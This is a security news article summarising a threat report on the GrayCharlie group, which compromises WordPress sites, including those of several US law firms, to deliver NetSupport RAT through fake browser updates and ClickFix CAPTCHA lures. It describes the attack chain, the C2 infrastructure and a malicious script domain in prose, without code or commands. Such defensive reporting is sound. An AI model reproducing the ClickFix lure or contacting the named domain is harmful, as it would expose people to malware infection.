The “ClickFix” Trap: GrayCharlie Syndicate Hijacks U.S. Law Firm Sites in Sophisticated Supply-Chain Strike

Experts from the Insikt Group division have promulgated the inaugural comprehensive dossier regarding GrayCharlie, a threat syndicate that, since mid-2023, has been compromising WordPress repositories to disseminate deleterious payloads via fraudulent browser updates and the sophisticated ClickFix stratagem. According to the research, the adversaries recently breached several prominent American law firms, an escalation that potentially signifies a software supply chain attack.

GrayCharlie, whose lineage is intertwined with the SmartApeSG cluster, embeds external JavaScript references within compromised digital assets. This script facilitates the redirection of visitors to portals featuring counterfeit Chrome, Edge, or Firefox updates, or alternatively, presents a deceptive CAPTCHA interface. Upon the execution of the retrieved file, the NetSupport RAT is surreptitiously installed, occasionally accompanied by the Stealc infostealer and SectopRAT. The primary objectives of these offensives are data exfiltration and illicit financial gain, though the secondary monetization of system access to rival criminal enterprises remains a distinct possibility.

Analysts have unmasked an expansive infrastructure associated with GrayCharlie. The command-and-control (C2) nodes for NetSupport RAT were predominantly situated within the hosting environments of MivoCloud and HZ Hosting Ltd. These servers were identified as cohesive clusters through distinctive TLS certificate attributes, serial numbers, and licensing keys. In several instances, certificates were generated near-simultaneously, indicating a centralized administrative apparatus. Furthermore, the investigation highlighted the pervasive use of proxy services and SSH for infrastructural management.

Significant emphasis within the report is directed toward a localized cohort of American legal firms; at least fifteen such entities were found to be loading malicious scripts from the persistancejs.store domain. A substantial number of these websites are associated with SMB Team, a provider of IT and marketing solutions for the legal sector.

The temporal alignment between the emergence of the malicious domain and the leakage of credentials linked to SMB Team’s infrastructure led researchers to hypothesize a contractor compromise—a classic supply chain offensive. An alternative theory posits the exploitation of vulnerable WordPress versions or plugins utilized by the firm’s clientele.

In 2025, GrayCharlie intensified its reliance on the ClickFix technique. A visitor to an infected site is enticed to complete a “verification” CAPTCHA, which silently copies a command to the system clipboard. The user is then prompted to execute this command via the Windows “Run” dialogue, triggering the download of an archive containing the NetSupport RAT. Alternatively, victims are coaxed into installing purported browser updates. In both scenarios, the malware achieves persistence through Windows Registry autorun keys and establishes a persistent link to the C2 server.

During the diagnostic evaluation of a malicious build, specialists observed operator activity within mere hours of initial compromise. The adversary proceeded to archive files and execute reconnaissance commands to ascertain domain group structures and user account hierarchies, confirming a profound interest in internal corporate network intelligence. Insikt Group evaluates that the syndicate maintains a resilient operational tempo, frequently deploying novel infrastructure. Given their strategic focus on United States organizations, the peril of subsequent offensives remains acute.